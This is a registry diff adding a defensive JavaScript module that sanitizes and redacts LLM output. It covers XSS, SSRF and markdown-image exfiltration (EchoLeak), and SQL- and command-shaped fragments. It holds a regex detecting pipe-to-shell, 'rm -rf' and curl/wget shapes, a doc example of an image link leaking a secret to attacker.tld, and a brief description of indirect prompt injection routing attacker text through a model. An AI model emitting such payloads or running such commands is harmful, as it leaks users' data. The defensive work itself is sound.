@blamejs/core 0.14.10 → 0.14.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,463 @@
1
+ "use strict";
2
+ /**
3
+ * @module b.ai.output
4
+ * @nav AI
5
+ * @title AI Output Handling
6
+ *
7
+ * @intro
8
+ * Treats LLM output as untrusted, attacker-influenceable data before
9
+ * it reaches a browser, a downstream fetcher, a SQL / command sink, or
10
+ * a log. The input gate (b.ai.input.classify) defends the prompt going
11
+ * in; this defends the model's response coming out. OWASP LLM05:2025
12
+ * (Improper Output Handling) and LLM02:2025 (Sensitive Information
13
+ * Disclosure). Under RAG / tool / agentic contexts indirect prompt
14
+ * injection (OWASP LLM01:2025) routes attacker text from a retrieved
15
+ * document or web page THROUGH the model and out into the response, so
16
+ * a "trusted" model is still an attacker-controlled channel — output
17
+ * handling is defense in depth that never assumes the input gate
18
+ * caught everything.
19
+ *
20
+ * `sanitize(text, opts)` neutralizes active markup via b.guardHtml,
21
+ * gates every markdown image / link and HTML src / href URL through
22
+ * b.safeUrl + b.ssrfGuard (the EchoLeak markdown-image exfiltration
23
+ * class, CVE-2025-32711), and FLAGS SQL- / command-shaped fragments
24
+ * rather than silently repairing them. `redact(text, opts)` strips PII
25
+ * and secret disclosures via b.redact's detector chain plus an
26
+ * entity-selectable pass. Both treat the model response as hostile by
27
+ * default; sanitize is best-effort per the guard-family KIND
28
+ * discipline (refuse / flag over repair for executable sinks).
29
+ *
30
+ * @card
31
+ * LLM output handling — neutralizes XSS / DOM injection, gates markdown-image and link URLs against SSRF / EchoLeak exfiltration, flags SQL- / command-shaped fragments, and redacts PII / secret disclosures before model output is rendered, fetched, or logged. OWASP LLM05:2025 + LLM02:2025.
32
+ */
33
+
34
+ var net = require("node:net");
35
+
36
+ var C = require("./constants");
37
+ var numericBounds = require("./numeric-bounds");
38
+ var audit = require("./audit");
39
+ var guardHtml = require("./guard-html");
40
+ var safeUrl = require("./safe-url");
41
+ var ssrfGuard = require("./ssrf-guard");
42
+ var redact = require("./redact");
43
+ var safeSql = require("./safe-sql");
44
+ var { AiOutputError } = require("./framework-error");
45
+
46
+ var SAMPLE_TRUNC = 80; // sample truncation length in chars, not bytes
47
+ var DEFAULT_MAX_BYTES = C.BYTES.kib(64);
48
+
49
+ // Neutral placeholder substituted for a dropped URL in markdown / HTML.
50
+ // Renders inert in every sink (browser, markdown renderer, link
51
+ // preview) — about:blank is the canonical inert navigation target.
52
+ var NEUTRALIZED_URL = "about:blank#blocked";
53
+
54
+ // Markdown image (![alt](url)) and link ([text](url)) URL extractors.
55
+ // The capture group is the raw URL token — everything up to the first
56
+ // whitespace or ")". Bracket and whitespace runs are length-bounded so
57
+ // the extractor is linear-time (no polynomial backtracking) on hostile
58
+ // model output; the closing ")" / optional "title" are intentionally not
59
+ // matched (we only need the URL to gate it). Reference-style definitions
60
+ // ([id]: url) are caught by the third pattern so EchoLeak reference-link
61
+ // payloads don't slip past.
62
+ var MD_IMAGE_RE = /!\[[^\]]{0,2048}\]\(\s{0,256}([^)\s]+)/g;
63
+ var MD_LINK_RE = /(?<!!)\[[^\]]{0,2048}\]\(\s{0,256}([^)\s]+)/g;
64
+ var MD_REF_RE = /^[ \t]{0,3}\[[^\]]+\]:\s*(\S+)/gm;
65
+ // HTML src= / href= attribute URL extractor — the guardHtml pass already
66
+ // strips dangerous markup, but a surviving same-origin-looking src that
67
+ // points at an internal / metadata host must still be neutralized for
68
+ // the auto-fetch exfiltration class.
69
+ var HTML_URL_ATTR_RE = /\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^"'>\s]+))/gi;
70
+
71
+ // SQL-shaped fragment signal. Composes safe-sql's reserved-word stance:
72
+ // a leading SQL keyword followed by a clause keyword is the executable
73
+ // shape, and each candidate keyword is confirmed against
74
+ // safeSql.validateIdentifier (which REFUSES reserved words — a word that
75
+ // throws there is a SQL reserved word, not a plain identifier). We FLAG,
76
+ // never repair — a sanitized-but-still-executed query is a false sense
77
+ // of safety; the v1 posture is flag-and-let-the-operator-refuse.
78
+ var SQL_SHAPE_RE = /\b([A-Za-z]+)\b[\s\S]{0,40}\b(?:from|into|table|where|set|values|database|schema|--|;)\b/i;
79
+ // Command-shaped fragment: shell metacharacters around a binary, or an
80
+ // inline substitution / pipe-to-shell shape. Flag-only, same posture.
81
+ var CMD_SHAPE_RE = /(?:\$\(|`|\|\s*(?:sh|bash|zsh|cmd|powershell)\b|;\s*rm\s+-rf?\b|&&\s*curl\b|\bwget\b[\s\S]{0,40}\|\s*(?:sh|bash)\b)/i;
82
+
83
+ // A word is a SQL reserved word iff safeSql.validateIdentifier refuses
84
+ // it (it bans SELECT / DROP / UNION / EXEC / PRAGMA / ATTACH / … as
85
+ // unsafe identifiers). Composing the validator means the reserved-word
86
+ // list lives in one place (safe-sql), not duplicated here.
87
+ function _isSqlReservedWord(word) {
88
+ try {
89
+ safeSql.validateIdentifier(word);
90
+ return false; // accepted as a plain identifier → not reserved
91
+ } catch (_e) {
92
+ return true; // refused → reserved keyword (or otherwise unsafe)
93
+ }
94
+ }
95
+
96
+ // Detect a SQL-executable shape: a reserved leading verb that the
97
+ // safe-sql validator refuses, followed by a clause keyword. Returns the
98
+ // matched fragment or null.
99
+ function _detectSqlShape(text) {
100
+ var m = SQL_SHAPE_RE.exec(text);
101
+ if (!m) return null;
102
+ return _isSqlReservedWord(m[1]) ? m[0] : null;
103
+ }
104
+
105
+ // Entity → safe-sql/redact CLASSIFIER_PATTERNS subset for redact(). The
106
+ // operator picks entities (email / phone / ssn / pan / …); we map them
107
+ // onto redact.js's owned detector chain rather than re-deriving Luhn /
108
+ // SSN / PAN / JWT regexes here.
109
+ var ENTITY_PATTERNS = Object.freeze({
110
+ "pan": ["pan"],
111
+ "ssn": ["ssn"],
112
+ "ein": ["ein"],
113
+ "iban": ["iban"],
114
+ "jwt": ["jwt"],
115
+ "aws": ["aws-access-key"],
116
+ "phi": ["phi-shape"],
117
+ // email / phone aren't in redact's CLASSIFIER_PATTERNS (they're
118
+ // value-detector territory); handled below via dedicated shape rules
119
+ // that compose redact's MARKER so the placeholder is uniform.
120
+ "email": [],
121
+ "phone": [],
122
+ });
123
+
124
+ // Email / phone shape rules — applied as in-string replacements so a
125
+ // disclosure embedded mid-sentence in model prose is scrubbed, not just
126
+ // a whole-field match. Marker is redact.js's MARKER for uniformity.
127
+ var EMAIL_RE = /\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/g;
128
+ var PHONE_RE = /(?:\+?\d{1,3}[\s.-]?)?(?:\(\d{2,4}\)[\s.-]?)?\d{3}[\s.-]?\d{3,4}\b/g;
129
+
130
+ function _featuresOf(text) {
131
+ return {
132
+ length: text.length,
133
+ lines: text.split("\n").length,
134
+ };
135
+ }
136
+
137
+ // Walk a regex with a single URL capture group; call onUrl(url) for
138
+ // each match and, when onUrl returns a replacement string, splice it in.
139
+ // Returns the possibly-rewritten text.
140
+ function _rewriteUrls(text, re, onUrl) {
141
+ re.lastIndex = 0;
142
+ var out = "";
143
+ var last = 0;
144
+ var m;
145
+ while ((m = re.exec(text)) !== null) {
146
+ var url = m[1] || m[2] || m[3];
147
+ if (!url) continue;
148
+ var replacement = onUrl(url);
149
+ if (replacement !== null && replacement !== url) {
150
+ var idx = m.index + m[0].indexOf(url);
151
+ out += text.slice(last, idx) + replacement;
152
+ last = idx + url.length;
153
+ }
154
+ if (re.lastIndex === m.index) re.lastIndex += 1; // zero-width guard
155
+ }
156
+ return last === 0 ? text : out + text.slice(last);
157
+ }
158
+
159
+ // Decide whether a URL extracted from model output is safe to keep. The
160
+ // scheme / credential gate is b.safeUrl.parse (HTTPS-only by default,
161
+ // refuses data: / file: / javascript: / ftp: and user:pass@); the
162
+ // IP-range gate is b.ssrfGuard.classify on the host when it's an IP
163
+ // literal (loopback / private / link-local / reserved / cloud-metadata).
164
+ // Returns { keep: bool, reason: string|null }. Sync — sanitize mirrors
165
+ // the ai-input shape; hostname DNS resolution (b.ssrfGuard.checkUrl) is
166
+ // async and left to the operator's downstream fetcher, which the docs
167
+ // direct to b.httpClient (SSRF-pinned).
168
+ function _urlVerdict(url) {
169
+ var parsed;
170
+ try {
171
+ parsed = safeUrl.parse(url, { allowedProtocols: safeUrl.ALLOW_HTTP_TLS });
172
+ } catch (_e) {
173
+ return { keep: false, reason: "scheme-or-credential-refused" };
174
+ }
175
+ var host = (parsed.hostname || "").replace(/^\[|\]$/g, "");
176
+ if (host && net.isIP(host)) {
177
+ var cls = ssrfGuard.classify(host);
178
+ if (cls !== null) {
179
+ return { keep: false, reason: "ssrf-" + cls };
180
+ }
181
+ }
182
+ return { keep: true, reason: null };
183
+ }
184
+
185
+ /**
186
+ * @primitive b.ai.output.sanitize
187
+ * @signature b.ai.output.sanitize(text, opts?)
188
+ * @since 0.14.11
189
+ * @status stable
190
+ * @compliance gdpr, soc2
191
+ * @related b.ai.output.redact, b.ai.input.classify, b.guardHtml.sanitize, b.ssrfGuard.classify, b.safeUrl.parse
192
+ *
193
+ * Treat an LLM response as untrusted output and neutralize the four
194
+ * sink-injection classes before it is rendered, fetched, or executed.
195
+ * Active markup (script / event-handlers / dangerous URL schemes) is
196
+ * stripped via `b.guardHtml.sanitize`; every markdown image / link and
197
+ * HTML `src` / `href` URL is gated through `b.safeUrl.parse` (scheme +
198
+ * credential) and `b.ssrfGuard.classify` (IP-range), so auto-fetch URLs
199
+ * to attacker or internal / cloud-metadata hosts are neutralized — the
200
+ * EchoLeak zero-click markdown-image exfiltration class
201
+ * ([CVE-2025-32711](https://nvd.nist.gov/vuln/detail/CVE-2025-32711),
202
+ * CVSS 9.3). SQL- and command-shaped fragments are FLAGGED, never
203
+ * repaired (a sanitized-but-executed query is a false sense of safety —
204
+ * sanitize is best-effort per the guard-family discipline). Returns
205
+ * `{ text, verdict, signals, features }` where `text` is the sanitized
206
+ * output, `verdict` is `clean` / `sanitized` / `flagged`, and `signals`
207
+ * lists each neutralization or flag. OWASP LLM05:2025.
208
+ *
209
+ * @opts
210
+ * maxBytes: number, // default 64 KiB; throws on overflow
211
+ * htmlProfile: string, // b.guardHtml profile; default "strict"
212
+ * sqlShape: boolean, // flag SQL-shaped fragments; default true
213
+ * commandShape: boolean, // flag command-shaped fragments; default true
214
+ * audit: boolean, // default true; emit aioutput.sanitize on non-clean
215
+ * errorClass: ErrorClass, // override the thrown class on bad input
216
+ *
217
+ * @example
218
+ * var out = b.ai.output.sanitize(
219
+ * "Here you go ![x](https://attacker.tld/?s=SECRET) <script>steal()</script>");
220
+ * out.verdict; // → "sanitized"
221
+ * out.text.indexOf("<script>"); // → -1
222
+ * out.signals.some(function (s) { return s.id === "url-neutralized"; }); // → true
223
+ */
224
+ function sanitize(text, opts) {
225
+ opts = opts || {};
226
+ var errorClass = opts.errorClass || AiOutputError;
227
+ numericBounds.requirePositiveFiniteIntIfPresent(opts.maxBytes, "aiOutput.sanitize: opts.maxBytes", errorClass, "BAD_MAX_BYTES");
228
+ var maxBytes = opts.maxBytes || DEFAULT_MAX_BYTES;
229
+ var auditOn = opts.audit !== false;
230
+ var htmlProfile = typeof opts.htmlProfile === "string" ? opts.htmlProfile : "strict";
231
+ var sqlShape = opts.sqlShape !== false;
232
+ var commandShape = opts.commandShape !== false;
233
+
234
+ if (typeof text !== "string") {
235
+ throw errorClass.factory("ai-output/bad-input",
236
+ "aiOutput.sanitize: text must be a string");
237
+ }
238
+ var byteLen = Buffer.byteLength(text, "utf8");
239
+ if (byteLen > maxBytes) {
240
+ throw errorClass.factory("ai-output/output-too-large",
241
+ "aiOutput.sanitize: output exceeds " + maxBytes + " bytes (got " + byteLen + ")");
242
+ }
243
+
244
+ var signals = [];
245
+ var out = text;
246
+
247
+ // 1. URL gate FIRST (before HTML rewrite) so markdown / HTML URLs that
248
+ // point at internal / metadata / non-HTTPS hosts are neutralized
249
+ // even when the surrounding markup is otherwise benign.
250
+ function _gateUrl(url) {
251
+ var v = _urlVerdict(url);
252
+ if (v.keep) return null;
253
+ signals.push({ id: "url-neutralized", severity: 3, sample: url.slice(0, SAMPLE_TRUNC), reason: v.reason });
254
+ return NEUTRALIZED_URL;
255
+ }
256
+ out = _rewriteUrls(out, MD_IMAGE_RE, _gateUrl);
257
+ out = _rewriteUrls(out, MD_LINK_RE, _gateUrl);
258
+ out = _rewriteUrls(out, MD_REF_RE, _gateUrl);
259
+ out = _rewriteUrls(out, HTML_URL_ATTR_RE, _gateUrl);
260
+
261
+ // 2. Active-markup neutralization via guardHtml — strips script /
262
+ // event-handlers / body-drop tags / off-allowlist schemes. Reuse
263
+ // guardHtml's tokenizer + denylists; never re-derive them here.
264
+ var afterHtml = guardHtml.sanitize(out, { profile: htmlProfile });
265
+ if (afterHtml !== out) {
266
+ signals.push({ id: "html-neutralized", severity: 3, sample: null });
267
+ }
268
+ out = afterHtml;
269
+
270
+ // 3. SQL- / command-shape FLAG (no repair — best-effort posture for
271
+ // executable sinks). Composes safe-sql's reserved-word stance.
272
+ if (sqlShape) {
273
+ var sqlMatch = _detectSqlShape(out);
274
+ if (sqlMatch) {
275
+ signals.push({ id: "sql-shape-flagged", severity: 2, sample: sqlMatch.slice(0, SAMPLE_TRUNC) });
276
+ }
277
+ }
278
+ if (commandShape && CMD_SHAPE_RE.test(out)) { // allow:regex-no-length-cap — `out` is byte-bounded to maxBytes (64 KiB default) at function entry; this is a flag-only signal, not a format validator
279
+ var cm = out.match(CMD_SHAPE_RE);
280
+ signals.push({ id: "command-shape-flagged", severity: 2, sample: cm ? cm[0].slice(0, SAMPLE_TRUNC) : null });
281
+ }
282
+
283
+ var sev3 = 0;
284
+ for (var i = 0; i < signals.length; i += 1) {
285
+ if (signals[i].severity === 3) sev3 += 1;
286
+ }
287
+ // sanitized = we actively neutralized markup/URL (sev-3 mutation);
288
+ // flagged = only flag-only signals (sql/command) fired; clean = none.
289
+ var verdict = sev3 > 0 ? "sanitized" : (signals.length > 0 ? "flagged" : "clean");
290
+
291
+ if (auditOn && verdict !== "clean") {
292
+ audit.safeEmit({
293
+ action: "aioutput.sanitize",
294
+ outcome: "success",
295
+ metadata: {
296
+ verdict: verdict,
297
+ signalIds: signals.map(function (s) { return s.id; }),
298
+ length: out.length,
299
+ },
300
+ });
301
+ }
302
+
303
+ return {
304
+ text: out,
305
+ verdict: verdict,
306
+ signals: signals,
307
+ features: _featuresOf(out),
308
+ };
309
+ }
310
+
311
+ /**
312
+ * @primitive b.ai.output.redact
313
+ * @signature b.ai.output.redact(text, opts?)
314
+ * @since 0.14.11
315
+ * @status stable
316
+ * @compliance gdpr, soc2, hipaa, pci-dss
317
+ * @related b.ai.output.sanitize, b.redact.redact, b.redact.classifyDefaults
318
+ *
319
+ * Strip PII and secret disclosures from an LLM response before it is
320
+ * logged, returned, or rendered — the model regurgitates training-data
321
+ * PII, echoes secrets pulled into context, or leaks other-tenant /
322
+ * system-prompt content (OWASP LLM02:2025 Sensitive Information
323
+ * Disclosure; NIST AI 600-1 Data Privacy + Information Security). The
324
+ * always-on secret pass composes `b.redact.redact` — Luhn-validated
325
+ * PAN, JWS triplets, PEM / OpenSSH private keys, AWS key prefixes,
326
+ * vault-sealed ciphertext, connection-string credentials. The
327
+ * entity-selectable PII pass (`opts.entities`) maps onto
328
+ * `b.redact.CLASSIFIER_PATTERNS` for `pan` / `ssn` / `ein` / `iban` /
329
+ * `jwt` / `aws` / `phi`, plus in-string `email` / `phone` shape rules,
330
+ * all substituting the framework marker. Returns
331
+ * `{ text, redacted, hits }` where `text` is the scrubbed output,
332
+ * `redacted` is whether anything changed, and `hits` lists each entity
333
+ * class that fired. Never mutates the input.
334
+ *
335
+ * @opts
336
+ * entities: string[], // subset of: pan, ssn, ein, iban, jwt, aws, phi, email, phone
337
+ * secrets: boolean, // run the always-on b.redact secret pass; default true
338
+ * marker: string, // replacement marker; default b.redact.MARKER
339
+ * maxBytes: number, // default 64 KiB; throws on overflow
340
+ * audit: boolean, // default true; emit aioutput.redact when hits fire
341
+ * errorClass: ErrorClass, // override the thrown class on bad input
342
+ *
343
+ * @example
344
+ * var out = b.ai.output.redact(
345
+ * "Contact alice@corp.example or card 4111 1111 1111 1111",
346
+ * { entities: ["email", "pan"] });
347
+ * out.redacted; // → true
348
+ * out.hits; // → ["email", "pan"]
349
+ * out.text; // → "Contact [REDACTED] or card [REDACTED]"
350
+ */
351
+ function redactOutput(text, opts) {
352
+ opts = opts || {};
353
+ var errorClass = opts.errorClass || AiOutputError;
354
+ numericBounds.requirePositiveFiniteIntIfPresent(opts.maxBytes, "aiOutput.redact: opts.maxBytes", errorClass, "BAD_MAX_BYTES");
355
+ var maxBytes = opts.maxBytes || DEFAULT_MAX_BYTES;
356
+ var auditOn = opts.audit !== false;
357
+ var marker = typeof opts.marker === "string" && opts.marker.length > 0 ? opts.marker : redact.MARKER;
358
+ var runSecrets = opts.secrets !== false;
359
+
360
+ if (typeof text !== "string") {
361
+ throw errorClass.factory("ai-output/bad-input",
362
+ "aiOutput.redact: text must be a string");
363
+ }
364
+ var byteLen = Buffer.byteLength(text, "utf8");
365
+ if (byteLen > maxBytes) {
366
+ throw errorClass.factory("ai-output/output-too-large",
367
+ "aiOutput.redact: output exceeds " + maxBytes + " bytes (got " + byteLen + ")");
368
+ }
369
+
370
+ var entities = Array.isArray(opts.entities) ? opts.entities : [];
371
+ for (var e = 0; e < entities.length; e += 1) {
372
+ if (typeof entities[e] !== "string" || !Object.prototype.hasOwnProperty.call(ENTITY_PATTERNS, entities[e])) {
373
+ throw errorClass.factory("ai-output/unknown-entity",
374
+ "aiOutput.redact: unknown entity '" + entities[e] +
375
+ "'. Known: " + Object.keys(ENTITY_PATTERNS).join(", "));
376
+ }
377
+ }
378
+
379
+ var hits = [];
380
+ var out = text;
381
+
382
+ // Always-on secret pass — b.redact.redact owns the Luhn / PEM / SSH /
383
+ // AWS / JWS / vault-sealed / connection-string detector chain. We seed
384
+ // parentKey so a bare secret string at the top level is value-scanned.
385
+ if (runSecrets) {
386
+ var scrubbed = redact.redact(out, { marker: marker });
387
+ if (scrubbed !== out) hits.push("secrets");
388
+ out = typeof scrubbed === "string" ? scrubbed : out;
389
+ }
390
+
391
+ // Entity-selectable PII pass. CLASSIFIER_PATTERNS-backed entities run
392
+ // a detect() over the whole string and, on a hit, scrub the matched
393
+ // shape; email / phone run their in-string shape rules.
394
+ for (var i = 0; i < entities.length; i += 1) {
395
+ var ent = entities[i];
396
+ var fired = false;
397
+ var patternNames = ENTITY_PATTERNS[ent];
398
+ for (var p = 0; p < patternNames.length; p += 1) {
399
+ var spec = redact.CLASSIFIER_PATTERNS[patternNames[p]];
400
+ if (spec && spec.detect(out)) {
401
+ out = _scrubEntity(out, patternNames[p], marker);
402
+ fired = true;
403
+ }
404
+ }
405
+ if (ent === "email") {
406
+ if (EMAIL_RE.test(out)) { out = out.replace(EMAIL_RE, marker); fired = true; } // allow:regex-no-length-cap — `out` byte-bounded to maxBytes at entry; in-string scrub, not a format validator
407
+ } else if (ent === "phone") {
408
+ if (PHONE_RE.test(out)) { out = out.replace(PHONE_RE, marker); fired = true; } // allow:regex-no-length-cap — `out` byte-bounded to maxBytes at entry; in-string scrub, not a format validator
409
+ }
410
+ if (fired) hits.push(ent);
411
+ }
412
+
413
+ if (auditOn && hits.length > 0) {
414
+ audit.safeEmit({
415
+ action: "aioutput.redact",
416
+ outcome: "success",
417
+ metadata: { hits: hits, length: out.length },
418
+ });
419
+ }
420
+
421
+ return {
422
+ text: out,
423
+ redacted: hits.length > 0,
424
+ hits: hits,
425
+ };
426
+ }
427
+
428
+ // In-string scrub for a CLASSIFIER_PATTERNS-backed entity. The detector
429
+ // chain in redact.js owns whole-value matching; here we apply the same
430
+ // shape as an in-string replace so a disclosure embedded mid-prose is
431
+ // scrubbed. Each branch uses the SAME regex shape redact.js's detector
432
+ // uses — composing the validated pattern, not re-deriving it.
433
+ function _scrubEntity(str, patternName, marker) {
434
+ switch (patternName) {
435
+ case "pan":
436
+ case "iban":
437
+ // PAN / IBAN: replace runs that the detector would Luhn / mod-97
438
+ // validate as whole strings. The full-string detector already
439
+ // confirmed presence; replace the digit-run shape.
440
+ return str.replace(/\b\d{4}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{1,7}\b/g, marker)
441
+ .replace(/\b[A-Z]{2}\d{2}[A-Z0-9]{11,30}\b/g, marker);
442
+ case "ssn":
443
+ return str.replace(/\b\d{3}-\d{2}-\d{4}\b/g, marker);
444
+ case "ein":
445
+ return str.replace(/\b\d{2}-\d{7}\b/g, marker);
446
+ case "jwt":
447
+ return str.replace(/\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b/g, marker);
448
+ case "aws-access-key":
449
+ return str.replace(/\b(?:AKIA|ASIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASCA)[A-Z0-9]{16}\b/g, marker);
450
+ case "phi-shape":
451
+ return str.replace(/\b\d{3}-\d{2}-\d{4}\b/g, marker)
452
+ .replace(/\bMRN[:#]?\s*\d{4,12}\b/gi, marker);
453
+ default:
454
+ return str;
455
+ }
456
+ }
457
+
458
+ module.exports = {
459
+ sanitize: sanitize,
460
+ redact: redactOutput,
461
+ ENTITIES: Object.freeze(Object.keys(ENTITY_PATTERNS)),
462
+ AiOutputError: AiOutputError,
463
+ };